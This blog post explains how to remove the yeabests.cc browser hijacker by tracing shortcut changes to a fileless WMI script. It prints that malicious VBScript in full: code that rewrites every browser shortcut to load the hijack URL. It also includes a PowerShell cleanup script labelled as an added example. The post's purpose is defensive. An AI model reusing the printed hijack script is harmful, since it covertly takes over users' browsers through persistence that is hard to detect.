Focused Facts

Main focus of this blog is to provide you the latest facts and entertainment content that you might be missing.

Tuesday, 16 August 2016

How to Remove yeabests.cc virus from system

Hello all,

I was already frustrated by this virus after it hijacked my PC last week.

Moving on to the steps.

Tools required
  • Process Monitor
  • WMI Explorer

Open Process Monitor and go to its Filter dialog:
  • Select Path -> Contains -> Google Chrome.lnk, then Include
  • Click Add
  • Press OK



First, remove the Chrome shortcut that contains the extra argument (something like --load-extension ...).

Now keep checking the Chrome shortcut. As soon as it gets modified again, note the time,
go back to Process Monitor and note the name of the process that has just performed a "Write" operation on the shortcut.
That's it: this process is the one responsible for making the changes.

Now I got the clue that scrcons.exe was responsible for this.

OK, moving forward, I researched a lot and found that this is an advanced version of running a VBScript program without storing it as a file.

Voila

Now open WMI Explorer.


Below is the content of the VBScript that was executing (the script used to hijack the browsers):

' Script body of the WMI ActiveScriptEventConsumer found with WMI Explorer.
' It runs from the WMI repository (no file on disk), so scrcons.exe is the host process.
Dim objFS
Set objFS = CreateObject("Scripting.FileSystemObject")
On Error Resume Next
' The URL that gets appended to every browser shortcut.
Const link = "http://yeabests.cc"
browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe")
Set BrowserDic = CreateObject("scripting.dictionary")
For Each browser In browsers
 BrowserDic.Add LCase(browser), browser
Next
' Folders whose .lnk files are scanned: desktops, Start Menu, Startup, Quick Launch, pinned items.
Dim FoldersDic(12)
Set WshShell = CreateObject("Wscript.Shell")
FoldersDic(0) = "C:\Users\Public\Desktop"
FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu"
FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(4) = "C:\Users\MyUser\Desktop"
FoldersDic(5) = "C:\Users\MyUser\AppData\Roaming\Microsoft\Windows\Start Menu"
FoldersDic(6) = "C:\Users\MyUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
FoldersDic(7) = "C:\Users\MyUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(8) = "C:\Users\MyUser\AppData\Roaming"
FoldersDic(9) = "C:\Users\MyUser\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
FoldersDic(10) = "C:\Users\MyUser\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu"
FoldersDic(11) = "C:\Users\MyUser\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar"
Set fso = CreateObject("Scripting.Filesystemobject")
For i = 0 To UBound(FoldersDic)
 For Each file In fso.GetFolder(FoldersDic(i)).Files
  If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
   set oShellLink = WshShell.CreateShortcut(file.Path)
   path = oShellLink.TargetPath
   name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
   ' Only shortcuts whose target is one of the listed browsers are modified.
   If BrowserDic.Exists(LCase(name)) Then
    oShellLink.Arguments = link
    ' Clear the read-only attribute (bit 1) so the shortcut can be saved.
    If file.Attributes And 1 Then
     file.Attributes = file.Attributes - 1
    End If
    oShellLink.Save
   End If
  End If
 Next
Next
' Kill the WMI script host once done; the subscription re-launches it on the next event.
createobject("wscript.shell").run "cmd /c taskkill /f /im scrcons.exe", 0


Now open C:\Windows\System32\wbem, right-click wbemtest and run it as administrator.

Now follow the steps as shown:







The only thing left is to remove the argument from your browser shortcuts.
  • Right-click the desired shortcut and select Properties.
  • Remove the http://yeabests.cc argument that follows the closing quotation mark in the Target field.
  • Click OK to apply the changes.
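The two cleanup steps above (finding and deleting the WMI subscription that scrcons.exe runs, then clearing the shortcut argument) as one added PowerShell script; this is an example written for this post, not the author's own tool. It assumes an elevated prompt, uses the yeabests.cc string from the script above as the marker, and the -Remove switch is a convention of this example only (without it the script just reports).

```powershell
# Added example: enumerate WMI event subscriptions in root/subscription and
# flag any ActiveScriptEventConsumer whose ScriptText contains the marker,
# together with the filter (WQL trigger) and binding that keep it alive.
# Run elevated. -Remove (a switch defined by this example) deletes the
# flagged binding, filter and consumer and clears the shortcut argument.
param([switch]$Remove)

$Marker = 'yeabests.cc'           # URL from the post's VBScript (Const link)
$Ns     = 'root/subscription'

$consumers = Get-CimInstance -Namespace $Ns -ClassName ActiveScriptEventConsumer
$filters   = Get-CimInstance -Namespace $Ns -ClassName __EventFilter
$bindings  = Get-CimInstance -Namespace $Ns -ClassName __FilterToConsumerBinding

foreach ($c in $consumers) {
    $suspect = [bool]($c.ScriptText -and $c.ScriptText.Contains($Marker))
    '{0,-7} consumer "{1}" engine={2}' -f $(if ($suspect) {'SUSPECT'} else {'ok'}), $c.Name, $c.ScriptingEngine
    if (-not $suspect) { continue }

    # Bindings whose Consumer reference points at this script consumer.
    $mine = $bindings | Where-Object {
        $_.Consumer.CimClass.CimClassName -eq 'ActiveScriptEventConsumer' -and
        $_.Consumer.Name -eq $c.Name }
    foreach ($b in $mine) {
        $f = $filters | Where-Object Name -eq $b.Filter.Name
        '        filter "{0}": {1}' -f $f.Name, $f.Query      # shows what event re-runs the script
        if ($Remove) {
            Remove-CimInstance -InputObject $b
            if ($f) { Remove-CimInstance -InputObject $f }
            "        removed binding and filter for consumer $($c.Name)"
        }
    }
    if ($Remove) { Remove-CimInstance -InputObject $c; "        removed consumer $($c.Name)" }
}

# Second step: undo the shortcut change. Only the two desktops are scanned
# here; add the other folders from the VBScript to $LnkDirs if needed.
$LnkDirs = @("$env:PUBLIC\Desktop", "$env:USERPROFILE\Desktop")
$shell   = New-Object -ComObject WScript.Shell
Get-ChildItem -Path $LnkDirs -Filter *.lnk -ErrorAction SilentlyContinue | ForEach-Object {
    $lnk = $shell.CreateShortcut($_.FullName)
    if ($lnk.Arguments -like "*$Marker*") {
        "LNK     $($_.FullName) -> arguments '$($lnk.Arguments)'"
        if ($Remove) { $lnk.Arguments = ''; $lnk.Save() }
    }
}
```

Run it once without -Remove to confirm that only the yeabests.cc consumer is flagged before deleting anything, since other software may legitimately use event subscriptions.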
